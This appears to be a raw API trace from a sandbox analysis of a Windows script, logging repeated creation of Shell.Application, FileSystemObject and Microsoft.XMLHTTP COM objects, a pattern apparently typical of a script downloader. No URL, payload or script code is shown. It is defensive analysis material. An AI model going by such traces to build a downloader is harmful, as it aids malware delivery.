	[0591.908] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0591.908] SysStringLen (param_1=0x0) returned 0x0
	[0591.908] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0591.909] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0591.909] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0591.909] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0591.909] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0591.909] ??2@YAPEAX_K@Z () returned 0x62f350
	[0591.909] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0591.909] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0591.909] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0591.909] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0591.909] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0591.909] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0591.910] SysStringLen (param_1=0x0) returned 0x0
	[0591.910] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0591.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0591.913] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0591.913] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0591.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0591.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0591.913] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0593.939] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0593.939] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0593.939] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0593.941] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0593.941] SysStringLen (param_1=0x0) returned 0x0
	[0593.941] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0593.941] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0593.941] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0593.941] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0593.941] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0593.941] ??2@YAPEAX_K@Z () returned 0x62f310
	[0593.941] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0593.941] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0593.941] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0593.941] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0593.941] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0593.941] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0593.942] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0593.944] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0593.945] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0593.945] SysStringLen (param_1=0x0) returned 0x0
	[0593.945] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0593.945] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0593.945] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0593.945] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0593.945] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0593.945] ??2@YAPEAX_K@Z () returned 0x62f330
	[0593.945] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0593.945] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0593.945] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0593.945] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0593.945] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0593.945] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0593.946] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0593.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0593.946] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0593.946] SysStringLen (param_1=0x0) returned 0x0
	[0593.946] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0593.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0593.946] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0593.946] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0593.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0593.946] ??2@YAPEAX_K@Z () returned 0x62f310
	[0593.946] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0593.946] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0593.946] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0593.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0593.946] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0593.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0593.947] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0593.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0593.947] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0593.947] SysStringLen (param_1=0x0) returned 0x0
	[0593.947] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0593.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0593.947] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0593.947] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0593.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0593.947] ??2@YAPEAX_K@Z () returned 0x62f330
	[0593.947] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0593.947] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0593.947] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0593.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0593.947] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0593.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0593.948] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0593.948] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0593.948] longjmp () 
	[0593.948] longjmp () 
	[0593.948] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0593.948] SysStringLen (param_1=0x0) returned 0x0
	[0593.948] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0593.948] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0593.948] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0593.948] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0593.948] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0593.948] ??2@YAPEAX_K@Z () returned 0x62f310
	[0593.948] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0593.948] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0593.948] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0593.948] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0593.949] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
